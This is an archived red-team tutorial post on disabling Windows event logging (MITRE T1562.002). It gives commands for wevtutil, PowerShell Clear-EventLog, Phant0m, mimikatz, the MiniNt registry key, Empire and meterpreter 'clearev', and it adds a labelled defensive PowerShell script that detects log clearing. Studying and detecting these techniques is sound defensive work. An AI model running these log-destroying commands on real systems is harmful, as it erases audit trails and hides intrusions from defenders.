Defense Evasion: Windows Event Logging (T1562.002)
By raj
Published: 2021-04-22 · Archived: 2026-04-05 22:06:27 UTC

In this post, we explore Windows Event Logging defense evasion techniques used by attackers to avoid detection. By disabling, bypassing, or tampering with event logs using tools and scripts, threat actors can cover their tracks and stay hidden from security teams. Understanding these techniques is crucial for defenders to strengthen monitoring and response capabilities.

Defense Evasion is a cyber kill chain tactic: the set of techniques attackers use to avoid being detected during an intrusion.

MITRE TACTIC: Defense Evasion (TA0005)
MITRE TECHNIQUE: Impair Defenses (T1562)
SUB-TECHNIQUE: Disable Windows Event Logging (T1562.002)

Table of Contents
Clear Event log using Wevtutil Command
Clear Event log using Powershell
Phantom
Mimikatz
MiniNT registry key
Powershell Empire
Metasploit

To restrict the amount of data that can be used for detection and audits, an attacker can disable Windows event logging. Login attempts, process creation, and other user and device behaviour are all recorded in Windows event logs. Security tooling and analysts use this information to identify the artifacts of an intrusion.

Clear Event log using Wevtutil Command

wevtutil is a built-in system tool that lets you look up details on event logs and publishers. You can also use it to install and uninstall event manifests and to export, archive, and clear logs.
https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ Page 1 of 10

Execute the following command with administrator rights:

    wevtutil cl security

The Security log is clear now, but one event with ID 1102 is generated to record that the log was cleared.

Clear Event log using Powershell

Another method is to use PowerShell to clear logs; as you can observe, the machine has both a System and a Security log. Run PowerShell as administrator and execute the following commands:

    Clear-EventLog -LogName Security
    Clear-EventLog -LogName System

The above commands clear all entries from the System and Security logs.

Phantom

This script walks the thread stacks of the Event Log Service process (a specific svchost.exe), identifies the Event Log threads, and kills them. The system will then no longer collect logs, while the Event Log Service still appears to be running.
Download it from here.

    powershell -ep bypass
    Import-Module .\Invoke-Phant0m.ps1
    Invoke-Phant0m

Mimikatz

How can we forget mimikatz when it comes to the red teaming approach? Mimikatz is the most effective method, allowing you not only to steal credentials but also to clear the logs from within the Event Viewer. Run mimikatz as administrator and execute the following commands:

    privilege::debug
    event::
    event::clear

MiniNT registry key

You can play with the registry: create the registry key mentioned below and reboot the machine to reload the hive.

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt"

With this key present, the Event Log service does not start, so no logs are generated.

PowerShell Empire

PowerShell Empire can also be used to clear logs, identify Event Log threads, and kill Event Log Service threads.
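Every technique on this page leaves something a defender can look for: the clearing commands (wevtutil, Clear-EventLog, mimikatz event::clear, and meterpreter's clearev further down) produce Security event 1102 or System event 104, while Phant0m, Empire's phant0m module, and the MiniNt key leave the service looking healthy but silent. The following PowerShell script is an added example, not code from the original post or from any of the tools it describes. It assumes it is run elevated on the host being checked; the lookback window, the probe source name EventLogHealthProbe and the probe event ID 9001 are values chosen for this example.

```powershell
# Added example (not from the original post): host-side checks for the event-log
# tampering described on this page. Run elevated. The lookback window, probe
# source name and probe event ID are assumptions chosen for this example.
param([int]$LookbackHours = 24)

$since    = (Get-Date).AddHours(-$LookbackHours)
$findings = [System.Collections.Generic.List[string]]::new()

# --- 1. Records left behind by clearing a log.
#        Security 1102: "The audit log was cleared".
#        System 104 (Microsoft-Windows-Eventlog): System or Application log cleared.
$clearFilters = @(
    @{ LogName = 'Security'; Id = 1102; StartTime = $since }
    @{ LogName = 'System';   Id = 104;  StartTime = $since }
)
foreach ($f in $clearFilters) {
    Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
        # Both events carry the clearing account under UserData/LogFileCleared;
        # 104 also names the channel that was cleared, 1102 is always Security.
        $x    = [xml]$_.ToXml()
        $who  = $x.Event.UserData.LogFileCleared.SubjectDomainName + '\' +
                $x.Event.UserData.LogFileCleared.SubjectUserName
        $chan = $x.Event.UserData.LogFileCleared.Channel
        if (-not $chan) { $chan = $_.LogName }
        $findings.Add("$chan log cleared at $($_.TimeCreated) by $who (event $($_.Id))")
    }
}

# The 1102/104 records themselves vanish on the next clear, so a Security log whose
# oldest surviving record is recent is a signal in its own right.
$oldest = Get-WinEvent -LogName Security -Oldest -MaxEvents 1 -ErrorAction SilentlyContinue
if ($oldest -and $oldest.TimeCreated -gt $since) {
    $findings.Add("Oldest Security record is from $($oldest.TimeCreated); log covers less than $LookbackHours hours")
}

# --- 2. Conditions that silence the service without clearing anything.
#        MiniNt key: the Event Log service will not start after the next reboot.
if (Test-Path 'HKLM:\SYSTEM\CurrentControlSet\Control\MiniNt') {
    $findings.Add('HKLM\SYSTEM\CurrentControlSet\Control\MiniNt exists')
}

#        Service state as the Service Control Manager reports it. Phant0m kills the
#        logging threads but leaves this as Running, so this check alone is not enough.
$svc = Get-Service -Name EventLog
if ($svc.Status -ne 'Running') {
    $findings.Add("EventLog service status is $($svc.Status)")
}

#        Liveness probe: write a uniquely marked event and confirm it was stored.
$probeSource = 'EventLogHealthProbe'   # hypothetical source name for this example
$probeId     = 9001                    # arbitrary event ID for this example
$marker      = [guid]::NewGuid().ToString()
try {
    if (-not [System.Diagnostics.EventLog]::SourceExists($probeSource)) {
        New-EventLog -LogName Application -Source $probeSource
    }
    $t0 = Get-Date
    Write-EventLog -LogName Application -Source $probeSource -EventId $probeId `
                   -EntryType Information -Message "health probe $marker"
    Start-Sleep -Seconds 2
    $seen = Get-WinEvent -FilterHashtable @{
                LogName = 'Application'; ProviderName = $probeSource
                Id = $probeId; StartTime = $t0.AddSeconds(-5) } -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -like "*$marker*" }
    if (-not $seen) {
        $findings.Add('Probe event was not recorded: service reports Running but is not logging')
    }
} catch {
    # With the service's worker threads gone the write can fail outright rather
    # than being dropped silently; treat that the same way.
    $findings.Add("Probe event write failed: $($_.Exception.Message)")
}

# --- 3. Report, with a non-zero exit code so a scheduled task or agent can alert.
if ($findings.Count -eq 0) {
    Write-Output "No event-log tampering indicators found (lookback $LookbackHours h)."
    exit 0
}
$findings | ForEach-Object { Write-Warning $_ }
exit 1
```

Two caveats when running this. A host-local check is only as trustworthy as the host: once an attacker holds administrator rights they can clear the 1102 record again or stop the probe, so the durable control is forwarding Security and System events to a collector (Windows Event Forwarding or a SIEM) and alerting on 1102 and 104 there, where a sudden silence from a host that was previously forwarding is itself an alert. The oldest-record heuristic also needs tuning: a small Security log on a busy server rolls over naturally, so raise the log size or shorten the window before treating it as an indicator. The probe source can be removed afterwards with Remove-EventLog -Source EventLogHealthProbe.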
Use the following commands to execute the module against the respective agent:

    usemodule management/phant0m
    execute

Metasploit

Last but not least, we have the Metasploit framework to clear the Application, Security, and System logs from within the Event Viewer. In the meterpreter session, execute the following command:

    clearev

Disabling Windows Event Logging is a common defense evasion technique used by attackers. Understanding how this tactic works is crucial for defenders to detect and mitigate such stealthy attacks.

For more on MITRE ATT&CK, refer to this: Link

Reference: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.

Source: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/